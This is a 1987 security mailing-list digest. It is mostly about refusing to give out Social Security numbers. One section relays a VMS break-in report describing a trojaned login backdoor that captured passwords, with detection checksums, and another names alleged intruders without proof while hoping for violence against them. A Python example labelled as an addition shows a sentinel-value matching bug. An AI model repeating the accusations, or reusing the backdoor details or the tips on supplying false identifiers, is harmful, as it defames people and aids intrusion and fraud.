I agree that Mr. Spafford showed great poise and determination in refusing to give out information against his will. But as Mr. Behr has pointed out, there's no point withholding it once everybody has it. And, considering that Southern Bell had Mr. Spafford's social security number in spite of the fact that he never gave it to them personally, it's clear to me that if someone wants your SS# bad enough, they'll get it whether you want them to or not. I'll agree that withholding it whenever possible at least reduces the probability that some Joe on the street will obtain it and misuse it; but there's a bit of paranoia in that attitude as well.
If the options are to risk the information leakage and subsequent misuse, or to have stress-inducing episodes similar to Mr. Spafford's affair with the arrogant GTE employee, personally I'll take the information risk. Nevertheless, an interesting account of the narrowing interpretation of American privacy.

--
Craig D. Singer                  ARPA:  cds@cs.duke.edu
Department of Computer Science   UUCP:  ...!decvax!duke!cds
Duke University                  CSNET: cds@duke
Durham, NC 27706-2591 USA        Phone (919) 684-5110 ext. 20

From: poisson.usc.edu!mlinar@oberon.usc.edu (Mitch Mlinar) 23-Jul-1987 01:06:33
To: security@RUTGERS.EDU
Subj: [814] Re: SS# & Utilities -- a story

In article <16026@gatech.edu> spaf@gatech.UUCP (Gene Spafford) writes:
>3) Anyone know if Indiana does, in fact, *require* that the SS# be
>on the driver's license?

I am not sure about Indiana, but I have lived in CA, WI, IL, and CO: NONE of them require SS#. In fact, WI and IL function off credit cards whereas CA and CO function off driver's license #.

It is also a GOOD idea to check with the local SS office every two years and get a report of your account activity (you are legally entitled). If there has been anyone USING your SS# to "steal" the funds, you will know about it. (If you wait more than 7 years[?], whatever is missing is gone.)

From: Paul Martin 24-Jul-1987 15:00:22
To: security@RUTGERS.EDU
Subj: [4197] SSN again

I too have resisted handing my SSN to every bozo who requests it, and have consistently met with great surprise that anyone should be so brazen as to hide such basic information. I got in the habit of refusing to supply it when I worked for business DP houses to support my undergraduate education. California asked me for it when I traded in my NC drivers license (1972), and also every time I've registered a car here since then. They always point out that I HAVE to supply it, so I write "Privacy Act" in the slot, they show it to their supervisor, and the matter ends there.
It turns out that California uses the SSN to tie drivers licenses and vehicle registrations together, so that if a driver has any dealings with the law, any warrants for old parking tickets can be settled by putting him in jail until they are paid off. While this certainly has the effect of reducing the number of parking scofflaws on the roads, it has interesting implications for the SSN.

I learned of the DMV practice in 1974 when I was stopped on suspicion of car theft while trying to push-start my girl-friend's car for her. The officer got friendly when the ownership was cleared up, but then pursued and pulled me when the radio dispatch told him I had an outstanding warrant for parking. Details of the warrant and the claim that it arose from a parking incident in a year that I was never in CA convinced me, and eventually the officer, that something was amiss. He let me "escape", and, per my promise, I called the sheriff to find out what was up. Seems that a fellow named "Paul __Allen__ Martin" had lived in Monterey, parked overtime in SanFran, and failed to pay the piper for this tune. So what? Well, seems he had ALSO refused to supply his SSN, so both he and I had "000-00-0000" entered in the DMV computer; the drooling idiots in DMV's DP department hadn't provided a value to indicate "not known" for that field! So, the officer calling my name in on the radio [Paul ___Alan___ Martin] would be informed of "my" warrants based on an "exact match" on the SSN. For the next three years, I had to point out the spelling of my middle name as a prelude to every dealing with DMV and law officers to avoid a trip to the cooler. The statute of limitations finally came to my rescue, but I have no idea whether I'm still on file as "bad guy who got away".

I am a regular blood donor for both the Red Cross and the local med school hospital (Stanford U).
I have done pheresis donations for specific patients; this is a process where 6 to 12 times as much blood as a normal donation is taken (a bit at a time) and separated to extract just the component needed by the patient. The components are always something like white cells which, especially in such high doses, must be carefully matched to the recipient's immune system. This matching process is the same one used for organ donor matching; because of the degree of match required, there are typically dozens instead of millions of potential donors known for a given pattern. To block all sorts of undesirable interactions (e.g., bribery, extortion, or even innocent but desperate pleading), a secure wall of anonymity is maintained between the donor and the recipient. Despite this, the Red Cross and Stanford Med Center each ask for the donor's SSN! When I refuse it (offering some alternative to disambiguate me from others with the same name), they ask me "Why?" I point out that if their files on HLA type (the immune system coding scheme) were ever stolen, I'd hate to have someone who was quite rich, quite sick, and quite ruthless discover that (1) I matched his HLA type, (2) My heart works a lot better than his (or else they wouldn't accept me as a pheresis donor), and (3) I've filed a universal organ donor card, making my spare parts available in the event that some hood should happen to blow my head off in the foyer of a hospital....

After hearing this explanation, most nurses say something along the lines of "I wonder if I can purge my OWN SSN from the database?"

Cheers... Paul

From: "Bryan, Jerry" 24-Jul-1987 17:13:26
To:
Subj: [3575] SS# & Utilities -- a story

> As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards. The reasons why have been discussed numerous times in various security-related groups.
> It is my understanding that it is against the law to force someone to give his/her social security number unless it is a government agency; although I've often run into occasional resistance, a few moments of explanation has usually resulted in things working out okay.

I wish you were correct, but contrariwise, there seem to be no restrictions whatsoever about the use of social security numbers *outside* the government. All the restrictions seem to apply only to the government.

> The guy at GTE claims that the Indiana licenses are *required* to have the SS# on them -- anyone know if this is true? It shouldn't be...)

Again, sorry to be a pessimist, but driver's licenses are one area where federal law specifically *permits* states to require SSN's. Of course, once it is a part of your driver's license, there is virtually no way *not* to give it out to the rest of the world. Also, I spent three years in Virginia not being able to vote because I would not give them my SSN. In the bitter end, the law was on their side via a grandfather clause. This is different from the driver's license case. A state can require SSN for voting only if they required it before some date ('74 maybe, or '79), but they can require it for driver's license, period. Also, *every* time the government asks for it, they are supposed to cite the law which authorizes it, but they never do. Unfortunately, if they violate federal law by failing to provide such notification, there is no penalty. Thus, there is no real force to the law.

> 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too?

Yes, and yes, but I have just about given up. The people you deal with do not know what you are talking about, and have no authority anyway. Going to supervisors does not really improve things. I am convinced that effort at this level is totally wasted. About the only place where effort is worthwhile is with Congress.
Until there is legislation without so many exceptions and with penalties for non-compliance, we are all wasting our time.

> 3) Anyone know if Indiana does, in fact, *require* that the SS# be on the driver's license?

I believe the answer is yes, based on relatives who live there.

> 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received?

Possibly, but only for the treatment you received, not the SSN issue itself.

As a point of interest, there are many cases where the applicability of the existing law (weak though it may be) is unclear. The existing law applies to "federal, state, and local government". For example, is a state university covered as "federal, state, or local government"? Is a phone company which is regulated by a State government? My experience is that a state university will claim to be a part of the state government when it is to their advantage and your disadvantage, and vice versa of course (as when state employees are given a pay raise and university employees are not or vice versa).

From: Nick Papadakis 24-Jul-1987 17:42:32
To: security@RUTGERS.EDU
Subj: [2144] SS# & Utilities -- a story

> As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards.

me too.

> 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too?

sure do.

> 3) Anyone know if Indiana does, in fact, *require* that the SS# be on the driver's license?

Couldn't say. Virginia has written a statute that requires it for Virginia licenses.

> 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort).

Every time I have been asked for my ssn by someone who legitimately requires it (i.e.
the federal government) there has been an accompanying blurb with a reference to the federal law that empowers them to ask for it. Evidently Virginia is attempting to emulate this strategy. Unfortunately, the ssn isn't exactly in their purview, and their reasons for "needing" it fall more under the heading of convenience than real need. I frankly don't see why people's privacy should be threatened in order to make things slightly easier for a few programmers. Virginia has a history of being a place where bad laws are made. An example is the illegality of radar detectors there. (as far as I know, only D.C. and Connecticut have similar laws.)

I'd say, make it as expensive as you can for them to do business with you until they do business right. Monopolize as much phone time and letter writing-time as possible - it costs them about $30 to write you a form letter. Monopolies need to be kicked periodically. Use your rights or lose them.

> Too bad we don't have a choice of phone companies as well as long distance carriers -- I'd keep Southern Bell.

Maybe you should find out how they got your ssn first ...

--
Nick Papadakis
nick@mc.lcs.mit.edu
SSN: 213-09-2981 (right ...!):-)

From: DPickett@his-phoenix-multics.arpa 25-Jul-1987 00:56:15
To: Security@RUTGERS.EDU
Subj: [1944] Re: SS and the data thieves...

The privacy act of 19?? (consult your local ACLU chapter) forbids use of the SSN except for valid SS purposes like tax and employment and such, except for federal agencies covered under a grandfather clause and also state governments, but then only by statute (no bureaucratic initiatives without legislative approval). New Jersey had a bill bouncing around to rescind the bill that allowed them to force us to divulge it. My university tried to get it, but I made them give me another and then had a great time correcting and confusing them with my 4 digit "Social Security Number".

The main reason for overuse of the SSN is simplemindedness. Numbers are a great resource.
You can give them out. Until you give out a lot, they stay compact. Anyone can make up a numbering system. But they prefer to steal someone else's system, especially if you already know your number and it is unique. There is a natural tendency for the disadvantages of an old way to attach themselves to a new way. Ever see a computer operator cry because checks get ruined? You'd think it was money, not preprinted forms!!! So it is with numbers; instead of your name and address or whatever, they can organize their data better by arbitrary numbering. But they use non-arbitrary numbering, because they miss the point!

So, the best reason to refuse them your SSN is that they are misusing the concept of numbering! Spread knowledge to the masses. Explain how numbering works best only if it is arbitrary and specialized. Explain how the SSN has so many digits that they could as easily look up your name! (9999 customers looked up in a table of SSN could take ten trillion digits of storage!) Point out that you are the only David Pickett at RR2, box 631, Thorofare, NJ 08086-9632, born 5/20/49.

From: William Daul / McDonnell-Douglas / APD-ASD 27-Jul-1987 17:29:03
To: SECURITY@RUTGERS.EDU
Subj: [481] Garage Door Openers (not your typical question)

A friend of mine has a two car / two door garage. He wants to install a remote control garage door opener on both doors with different frequencies for each door. He would also like ONE controller that can switch between the frequencies. Is there such an off-the-shelf system?

Thanks, --Bi//

From: Larry Hunter 27-Jul-1987 12:05:37
To: security@RUTGERS.EDU
Subj: [3317] Re: SS# & Utilities -- a story

> 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too?

Yes! I had a similar confrontation with Southern New England Telephone. When I initially tried to acquire phone service in New Haven, I refused to give out my social security number.
The customer service representative told me I would have to make a $200 deposit in lieu of giving out my SSN. I asked to talk to his supervisor. The supervisor gave me the same story. I told her that I was not going to give out my SSN and I was not going to pay anything extra as a result. I said further that if they intended to deny me service, they had better get in touch with their legal department and then call me back. The entire conversation was civil and friendly, but only because I kept it that way. I got a call back the next day telling me they would install my phone without a SSN or a deposit.

Why does this work? Simple. The privacy act of 1974 restricts governmental use of social security numbers. With certain (fairly significant) exceptions, a government agency cannot require your SSN unless it is related to social security or tax matters. Furthermore, if a gov't. agency asks for your SSN voluntarily, they must explain that it is voluntary and that it makes no difference if you give it or not. On the other hand, there is NO legislation restricting commercial uses of SSNs; if you don't give it to them, they don't have to do business with you. This is especially pernicious with credit and banking institutions.

At any rate, the phone company falls in between: Since they are a state regulated monopoly, they probably don't have the ability to demand your SSN. They certainly don't want that tested in court, since they might lose the freedom to coerce and intimidate as they do. Phone companies lose huge amounts of money on unpaid final bills, and they like to be able to track people down -- SSNs are, of course, invaluable for this. You'll find other local monopolies (e.g. gas and electric companies) work pretty much the same way. With them, your SSN is yours alone.

Probably the best reference on all of this stuff is Robert Ellis Smith's "Privacy: How to Protect What's Left of It", available for $7 (prepaid) from The Privacy Journal, P.O.
Box 15300, Washington, DC 20003. The PJ itself is a great newsletter for keeping track of this kind of stuff, and they have a variety of other interesting publications for sale.

> 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort).

Yes! It is definitely worth sending off a few letters. I'd send copies to the phone company's customer service department, the state public utilities commission, your state representatives, your congressmen, local newspapers and to the Privacy Journal (address above). If nobody complains about this sort of thing, it will be institutionalized beyond change before we know it.

Larry Hunter

From: RMOREY%ATLAS%rca.com@relay.cs.net 28-Jul-1987 06:28:13
To: SECURITY-REQUEST@RUTGERS.EDU
Subj: [715] SS#

I don't understand how a Social Security number could be abused. In Massachusetts, your driver's licence number IS your social security number. Therefore, anytime you write a check to a store, they write your licence no. (SS#) and a charge card no. on the back of your check for approval. I can see how, in this state, it would be VERY easy for ANYONE to obtain your SS#. So, being rather naive, I'd like to know what to watch out for in giving out my SS#, and how someone could abuse my number. Thank you.

Randy Morey
GE Automated Systems
Burlington, Mass
RMOREY%ATLAS%RCA.COM@RELAY.CS.NET

From: trainor@locus.ucla.edu 29-Jul-1987 22:09:51
To: security@RUTGERS.EDU
Subj: [485] SS# other options

There are also other options. I know several people who give out random numbers and have been doing so for quite some time. They are very clever about not declaring it to be the number on file with Social Security. This is done verbally--boxes on forms are left blank. There are two variations: 1) random numbers at every query, 2) random numbers for each institution.
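Paul Martin's DMV story earlier in this thread (two drivers who both withheld their SSN were stored as "000-00-0000" and then tied together by an "exact match" on that field) is a sentinel-value matching bug. As an added example, not code from any posting, the Python below reproduces the false match, shows the fix of treating an unknown value as matching nothing, and adds an audit query that finds such collisions in a legacy table; the names, license numbers and warrant details are constructed.

```python
"""Sentinel-value identity matching, after the DMV mix-up in the thread.

Added example, not code from any posting.  Names, license numbers and
warrant details are constructed; "000-00-0000" is the placeholder the
story cites.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

UNKNOWN_SSN = "000-00-0000"   # what the DMV stored when a driver withheld the SSN


@dataclass(frozen=True)
class Driver:
    license_no: str
    name: str
    ssn: Optional[str]        # None means "not known" once the schema is fixed


@dataclass(frozen=True)
class Warrant:
    license_no: str
    ssn: Optional[str]
    name: str
    reason: str


def from_legacy(ssn_field: str) -> Optional[str]:
    """Import a legacy SSN field: the placeholder becomes a real unknown."""
    return None if ssn_field in (UNKNOWN_SSN, "") else ssn_field


def warrants_by_ssn_sentinel(ssn_on_file: str, warrants: List[Warrant]) -> List[Warrant]:
    """The 1974 lookup: an 'exact match' on the SSN column.  Two drivers who
    both withheld their number share the placeholder, so they match."""
    return [w for w in warrants if w.ssn == ssn_on_file]


def warrants_by_ssn_null(ssn_on_file: Optional[str], warrants: List[Warrant]) -> List[Warrant]:
    """Fixed lookup: an unknown value matches nothing (the SQL NULL rule), so
    a withheld SSN can never tie two people together."""
    if ssn_on_file is None:
        return []
    return [w for w in warrants if w.ssn is not None and w.ssn == ssn_on_file]


def warrants_for_driver(driver: Driver, warrants: List[Warrant]) -> List[Warrant]:
    """Match on the identifier the DMV itself issues (the license number) and
    fall back to the SSN only when both records really have one."""
    hits = [w for w in warrants if w.license_no == driver.license_no]
    return hits or warrants_by_ssn_null(driver.ssn, warrants)


def audit_sentinel_collisions(drivers: List[Driver], warrants: List[Warrant]) -> List[Tuple[str, str]]:
    """Defensive check on a legacy table: (driver, warrant holder) pairs that
    the sentinel 'exact match' would wrongly pin together."""
    out = []
    for d in drivers:
        stored = d.ssn if d.ssn is not None else UNKNOWN_SSN  # as the legacy column holds it
        for w in warrants_by_ssn_sentinel(stored, warrants):
            if w.license_no != d.license_no:
                out.append((d.name, w.name))
    return out


# Constructed sample data: two Paul Martins who both withheld their SSN.
DRIVERS = [
    Driver("CA-0001", "Paul Alan Martin", from_legacy(UNKNOWN_SSN)),
    Driver("CA-0002", "Paul Allen Martin", from_legacy(UNKNOWN_SSN)),
    Driver("CA-0003", "Jane Q Public", from_legacy("123-45-6789")),
]
WARRANTS_LEGACY = [   # stored with the placeholder, as before the fix
    Warrant("CA-0002", UNKNOWN_SSN, "Paul Allen Martin", "overtime parking, San Francisco"),
    Warrant("CA-0003", "123-45-6789", "Jane Q Public", "overtime parking, Los Angeles"),
]
WARRANTS_FIXED = [Warrant(w.license_no, from_legacy(w.ssn), w.name, w.reason)
                  for w in WARRANTS_LEGACY]

if __name__ == "__main__":
    alan = DRIVERS[0]
    print("legacy lookup for Paul Alan:",
          [w.name for w in warrants_by_ssn_sentinel(UNKNOWN_SSN, WARRANTS_LEGACY)])
    print("fixed lookup for Paul Alan:", warrants_for_driver(alan, WARRANTS_FIXED))
    print("collisions in legacy table:", audit_sentinel_collisions(DRIVERS, WARRANTS_LEGACY))
```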
From: 30-Jul-1987 00:39:31
To: security@red.rutgers.edu
Subj: [536]

Some of the older readers of this list may remember my posting of an outline for an article about computer security for lawyers which I was working on last year. (Is that a single sentence? Am I pretending to be a writer?) Anyway, I just got the galleys back from the publisher. It's going to be in the September issue. If anybody wants a copy of it, ask me and I'll send a draft. If the demand is great, I'll make it ftp'able.

-simson

From: David Chase 31-Jul-1987 00:14:35
To: security@RUTGERS.EDU
Subj: [433] re: SS#

Suppose I demand that a company with a copy of my SS# but no right or need for it remove my SS# from their records. Is there any hope of this working, or will they just laugh at me? Are there any big legal sticks that I can wield? If it is that important to keep the number secret, then this OUGHT to work.

David

From: RMOREY%ATLAS%rca.com@relay.cs.net 31-Jul-1987 18:44:41
To: SECURITY-REQUEST@RUTGERS.EDU
Subj: [1212] Dogs, defense against

Being new to the net, I'm not sure if this topic has been discussed before. My apologies if it has. My wife loves to take my daughters (ages 2 and 2 months) for walks, but there are usually 1 or 2 big dogs loose that terrify them. We have a leash law in my town, and a friendly dogcatcher. Calls to the dogcatcher do nothing. His office is only open from 3pm to 4pm. Also, dogs will come into our backyard where my 'girls' are playing and snarl at them. I have heard about aerosol sprays that deter attackers, but can't find them and don't know if they are legal. Someone suggested to my wife that she buy a squirt gun with a 30-foot range and fill it with ammonia to shoot at dogs.

Q: Would this work without getting me into a lawsuit from seriously injuring a dog? And what is in aerosol sprays that are used for self defense, if not mace? What sprays are legal and where are they found? I'm not a dog hater. I've never been a dog owner, either.
Does anyone have any better suggestions?

Randy Morey
GE Aerospace
Burlington, Mass
RMOREY%ATLAS%RCA.COM@RELAY.CS.NET

From: jeff%venus@rand-unix.arpa 24-Jul-1987 11:09:04
To: security@RUTGERS.EDU, jeff%venus@rand-unix.arpa
Subj: [548] Re: SS# & Utilities -- a story

To the best of my recollection, the last time I renewed my California driver's license, I was told my SS# was required. I asked for confirmation, saying it was my understanding that it could not be required by law, but they were adamant, so I did not pursue the issue even to the point of asking to talk to a supervisor.

Jeff Rothenberg
The RAND Corp.
jeff@rand.org

From: DKAVNER@ecla.usc.edu 24-Jul-1987 17:22:10
To: security@RUTGERS.EDU
Subj: [863] Re: SS# and Utilities

For many years I have tried to avoid giving out my SS#. Most of the time I have no problem, but occasionally I have given in due to a lack of knowledge on the applicable laws. It is great to hear of someone who has been so successful. It seems that the majority of people have no idea of the problems in giving out such information and that our government continues to encourage it.

One of my biggest frustrations is interest bearing bank accounts. The IRS requires you to give the bank your SS#, but as far as I know there are no restrictions on what they can do with it. Does anyone have a solution for this?

My SS card has the phrase "For tax purposes only, not for identification". Do the new cards issued today still have this phrase?

From: djw@lanl.gov (David Wade) 30-Jul-1987 12:20:31
To: hao!gatech!spaf@ames.arpa, security@RUTGERS.EDU
Subj: [6731] Re: SS# & Utilities -- a story

1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too?

Yes, but not wholly successfully. I too have kept my SSN private for the last eight or nine years. I had given the number out whenever asked up until that time. Now I sometimes run into the consequences of that action.
The University of New Mexico 'requires' your Social Security Number whenever you enroll in classes. If you are a foreign national, the University will assign you a number; if you are a US Citizen, they will not. I was not able to test this because I had previously given them my SSN. However, we got all my records marked such that the University won't give out my SSN without a court order.

4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort).

The telephone companies have had their own way for so long that it is nice to finally see that turning around. You seem to think highly of Southern Belle while you express surprise that they had information about you that you had never given them and that you think they didn't need.

The Privacy Act of 1974 covers only the government and its subcontractors. Currently, private companies can require whatever information they think their customers will provide. You may argue that Southern Belle is a subcontractor and you would be correct, but most people don't believe that your little problem applies to their great big company.

From "The Report of The Privacy Protection Study Commission", a booklet known as appendix 4, "The Privacy Act of 1974: an Assessment", page 3.

=============================================================================
Government contractors are another category of entities to which the Privacy Act applies. Subsection 3(m) of the Act provides that:

When an agency provides by contract for the operation by or on behalf of the agency of a system of records to accomplish an agency function, the agency shall, consistent with its authority, cause the requirements of . . . [the Act] to be applied to such system.
For purposes of subsection (i) [the criminal penalties provision] of [the Act] any such contractor and any employee of such contractor, if such contract is agreed to on or after the effective date of [the Act], shall be considered to be an employee of an agency. [5 U.S.C. 552a(m)]
=============================================================================

ibid., pp. 35

The Privacy Act also establishes criminal penalties for certain knowing and willful violations of its requirements. Subsection 3(i) provides that an officer or employee of an agency may be found guilty of a misdemeanor and fined up to $5,000 for knowingly and willfully disclosing individually identifiable information, the disclosure of which is prohibited by the Act or agency regulations thereunder, or for willfully failing to publish an annual "Federal Register" notice on a system of records. The same penalties may also be assessed against anyone who knowingly and willfully requests or obtains an agency record about an individual under false pretenses.
=============================================================================

ibid., pp. 5

What is Covered by the Act

Where the Act fails to meets (sic) its objectives, the failure can often be traced, in part, to the record and system-of-records definitions that further limit its scope of application. The Privacy Act applies to a "record" that is "retrieved" from a "system of records" by the name of an individual "or by some identifying number, symbol, or other identifying particular" assigned to him. [5 U.S.C. 552a(a)(5)] As defined in subsection 3(a)(4), "record" means:

. . .
any item, collection, or grouping of information about an individual that is maintained by an agency, including, but not limited to, his education, financial transactions, medical history, and criminal or employment history and that contains his name, or the identifying number, symbol, or other identifying particular assigned to the individual, such as a finger or voice print or a photograph. [5 U.S.C. 552a(a)(4)]
=============================================================================

However... ibid.

Thus, unless an agency, in fact, retrieves recorded information by reference to a "name. . .identifying symbol, or other identifying particular. . .," the system in which the information is maintained is not covered by the Act.
=============================================================================

You need to inform each "agency" what you consider "individual identifying information". You may then tell them that your

1) Name
2) Birthdate
3) Social Security Account Number (The one which identifies your retirement insurance payment information; and generally is of the form 123-45-6789...)
4) Street Address in conjunction with physical description information,
5) Phone Number in conjunction with physical description information,

are sufficiently private that they may not disclose these numbers without your specific written authority, and that the "agency" must show you a log of everyone who has had access to these "records". If they cannot do this before you give them the information, they are already in violation. What makes you think that they will clean up their act after you tell them your "Retirement Account Number".

These Privacy Act reports state that the majority of the burden of enforcement rests on the individual, and that the individual wasn't really interested. The Privacy Act was being observed as though it were a "good idea at the time, but not really applicable to 'my agency's situation'".
A letter about Southern Belle's having "acquired" your SSN should probably be directed to the Data Processing Manager explaining that he is liable for a $5,000 fine and that he'd probably better "cut it out". You did the proper thing to the "cracker" at Indiana Bell, but you should send them a copy of what you send to Southern Belle, this note with an explanation of what the 'Risks' group is, and a request for an apology and notification that the above listed items are Privacy Act items. You won't be able to get a free unlisted phone that way (I think, I really don't know, but the book says that that information is in the public domain). But you can certainly stop the harassment from the Service Representatives.

Dave

From: James M Galvin 31-Jul-1987 10:42:11
To: security@RUTGERS.EDU
Subj: [533] giving out your phone number

Gene Spafford's note made me think about giving out phone numbers. When you use a credit card, store clerks always ask you to sign the receipt and write down your phone number. Sometimes they ask for your address. Now, I don't normally like to give my phone number, even if it is listed in the phone book. So, I have always wondered, can they force you to give out your phone number?

Jim

From: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net 28-Jul-1987 13:25:14
To: security@RUTGERS.EDU
Subj: [786] RE: SS# & Utilities -- a story

Ok...maybe I'm a little naive...

First of all, I didn't know you could withhold your social security number. I have been giving it out just as a matter of course, never realizing that I could withhold it (not to mention that it was against the law to force me to give it out). That's interesting and I may decide to use it, although, at this point, it's probably all over the place so it's probably not worth my effort. I am very interested in hearing how it can be abused, however. Could you please elaborate on this a little?

Warren M. Iwamoto
Artificial Intelligence Laboratory
Texas Instruments, Inc.
iwamoto%ngstl1@eg.ti.com

From: John Owens 15-Aug-1987 10:12:39
To: SECURITY@RUTGERS.EDU, WBD.MDC@office-1.arpa
Subj: [718] Re: Garage Door Openers (not your typical question)

Well, most garage door openers that I've seen (I don't have one myself, not having a garage) have a set of DIP switches you can use to encode a unique pattern. The frequencies, at least within the same brand, are the same. So you could set your two openers to be one bit apart, and leave the hood off of the dip switches, and switch the one bit....

John Owens
Old Dominion University - Norfolk, Virginia, USA
john@ODU.EDU            old arpa: john%odu.edu@RELAY.CS.NET
john@xanth.UUCP         old uucp: {decuac,harvard,hoptoad,mcnc}!xanth!john

From: Brint Cooper 18-Aug-1987 13:44:30
To: Security@RUTGERS.EDU
Subj: [877] Re: SS and the data thieves...

Nearly all of the requests for SSN that I have seen have not required me to produce the card. In every case that I can think of, I could just supply the number from memory. What's to prevent someone who objects to passing his/her SSN around the town from providing a false one?

Similarly, many places now require a phone number on a credit card slip (Visa/MC). They don't check this number as part of verification. In restaurants, it's not even requested until you're signing the slip and leaving. I wonder what they do with this info. It might help someone who's fraudulently using your credit card number. It might also be sold to telemarketing firms. Again, why not submit a false one? Or your work phone? Or whatever?

_B

From: "McMahon,Brian D" 12-Aug-1987 12:10:25
To: SECURITY@RED.RUTGERS.EDU
Subj: [4400] More bad news on EMBL break-in

From: "McMahon,Brian D"
To: SECURITY@RED.RUTGERS.EDU
Subject: More bad news on EMBL break-in

Yesterday, I posted a message from the info-vax list to this board; at least, I *think* I posted it. I never actually saw it leave. Just in case, I'll repeat that before going on to the latest combat reports, and network loads be damned - this is serious.
In a message dated 31-Jul-1987, Roy Omond of the European Microbiology Lab in Heidelberg reported the following hair-raising story:

>Well, the well known patch to SECURESHR.EXE took a *long* time in coming
>to Europe. In fact, it took me several days to convince the local DEC
>people that there was a security loophole in VMS 4.5 ... *sigh*.
>Anyway, in the meantime, we got screwed around by German hackers
>(probably from the notorious Chaos Computer Club in Hamburg). Before I
>had the chance to install the patch, "they" managed to get in and did
>pretty well at covering their tracks. They patched two images, SHOW.EXE
>and LOGINOUT.EXE, so that a) they could login to *any* account with a certain
>password, which I'll not divulge, b) SYS$GW_IJOBCNT was decremented and
>c) that process would not show up in SHOW USERS. They have cost us a lot of
>real money by using our X.25 connection to login to several places all round
>the globe. I have done my best to notify per PSImail those VAX sites that
>were accessed from our hacked system. I pray (and pray and pray ...) that
>no other damage has been done, and that I'm not sitting on a time bomb.
>Anyway, the following information might help others to check if they have
>been tampered with:
>
>Use CHECKSUM to perform a checksum of LOGINOUT.EXE and SHOW.EXE as follows:
>
> $ Check Sys$System:Loginout.Exe
> $ Show Symbol Checksum$Checksum
>
> if you get the value 3490940838 then you're in trouble.
>
> $ Check Sys$System:Show.Exe
>
> if you get 1598142435, then again you're in trouble.
>
>Now something I'm a bit unsure about whether I should publicise :
>
>Two persons with known connections with the Chaos Computer Club in Hamburg
>who I know have distributed the patches mentioned above (and in my opinion
>are to be considered along with the lowest dregs of society) I will name
>here :
>
> Claus Traenkner (at our own outstation of the EMBL in Hamburg)
>and Stefan Weirauch (at the Univ.
>of Karlsruhe)
>
>in the hope that someone somewhere will a) be saved some hassle from them
>and b) might perform physical violence on them.
>
>Jeez, I'm scared ...
>
>Roy Omond

Pretty bad, already. But today, I found this cheery piece, dated 04-Aug-1987:

>Further to my "important message" of last week, I have since discovered
>that the patches done to LOGINOUT.EXE were even more lethal than I had
>imagined. Not only would it allow entry to any username with the magic
>password, but it would also store (in 1's complement form) the valid
>password of all users logging in since the patch was installed in the
>12 bytes "reserved for customer use" in the UAF. How many system managers
>ever even look at these bytes, never mind spot the danger there ?
>
>Well, they also distributed a small vanilla program to decipher these
>bytes and, lo and behold, a list of username/password pairs with accounts
>with (potentially) all privileges neatly marked with an asterisk.
>
>So everyone who even suspects that something might be amiss, look very
>closely at your UAF. Look in particular at the 12 bytes from offset
>1f6 (hex) in each record. If you reverse the 1's complement on these
>bytes and get something that looks like a password then ... :-(
>
>(Users with passwords longer than 12 characters or those with 2 passwords
>(like me) are relatively ok).
>
>Yet another hacker name to surface is user DKL at Bitnet/EARN node
>DHDMPI5 (the Max-Planck Institute for Atomic Physics, our neighbouring
>institute in Heidelberg). I don't know who the person is, but I hope
>that he/she is condemned to working with IBM MVS for evermore.

I will post to info-vax the suggestion that further developments be sent to this list, as well as to info-vax, by their originators, so you won't have to deal with me any more. I have a hunch this may not be over yet...
Brian McMahon, Grinnell College

From: "Stefan Weirauch, IRA, Uni Karlsruhe" 12-Aug-1987 12:48:12
To: info-vax%sri-kl.arpa%germany.csnet@RELAY.CS.NET,
Subj: [3566] RE: *** Important message ***

Remarks on the messages from Roy Omond (31-Jul) and Michael Bednarek (4-Aug).

Just back from my summer holidays, I have to notice some very strange statements in connection with my name.

Roy Omond wrote:

> Now something I'm a bit unsure about whether I should publicise :

He should better have given it more thought...

> Two persons with known connections with the Chaos Computer Club in Hamburg
> who I know have distributed the patches mentioned above (and in my opinion
> are to be considered along with the lowest dregs of society) I will name
  =======================

This is, in fact, a primitive insult, based on nothing but speculations.

> Claus Traenkner (at our own outstation of the EMBL in Hamburg)
> and Stefan Weirauch (at the Univ. of Karlsruhe)
>
> in the hope that someone somewhere will a) be saved some hassle from them
> and b) might perform physical violence on them.
  =========================

Well, just an instigation to perform violence. To build an opinion about this way of writing a public message is left to the reader.

However, as System/Security Manager I know very well those problems with hackers (see below). In case of detecting such a penetrator, I grab him and take further steps personally. At my site no personal mail relative to those topics in Roy Omond's message reached me. Maybe that is not astonishing in the light of a message which is based on some vague information.

Michael Bednarek wrote:

> I knew I had seen this name before, and (using rn) the command ?weirauch?ra
> showed article <8707221338.AA29452@ucbvax.Berkeley.EDU> which is a patch
> to PHONE. The date was 21-Jul-1987.
>
> In the light of Roy's experience you might want to examine the nature of that
> patch.
Well, this comment fully deserves my agreement, because you will see how well written the Phone Patch is (of course, I mean the second, bugfixed version). But does it make sense to examine software distributed over the net only if there is someone railing at the creator? I think you always should very carefully examine such software performing modifications of the operating system. If you are not able to do this, for example because you have no micro-fiches, it is reasonable to wait for such modifications from DEC. I did not add such a hint to my PHONEPAT description, because I suppose we all think that way.

As I mentioned in my PHONEPAT message, there are many clever student users at our site, detecting bugs or undocumented features in VMS. I spend a lot of time in preventing them from successfully attacking the system. To do this efficiently I made my thoughts about the things a hacker might perform. Thus, I learned much, and hacked patches to parts of the system as a problem of system security (again affecting my nerves and time) are old for me; if they are new to you, don't accuse those people making their experiences with these aspects of security, but learn from them and be thankful!

Stefan Weirauch                    CSNET: WEIRAUCH%iravcl@germany.csnet
Informatik-Rechner-Abteilung       UUCP:  WEIRAUCH%iravcl%uka.uucp@unido.uucp
Universitaet Karlsruhe             PSI:   PSI%026245721042100::WEIRAUCH
D-7500 Karlsruhe 1
West Germany

From: davy@intrepid.ecn.purdue.edu (Dave Curry) 29-Aug-1987 12:03:02
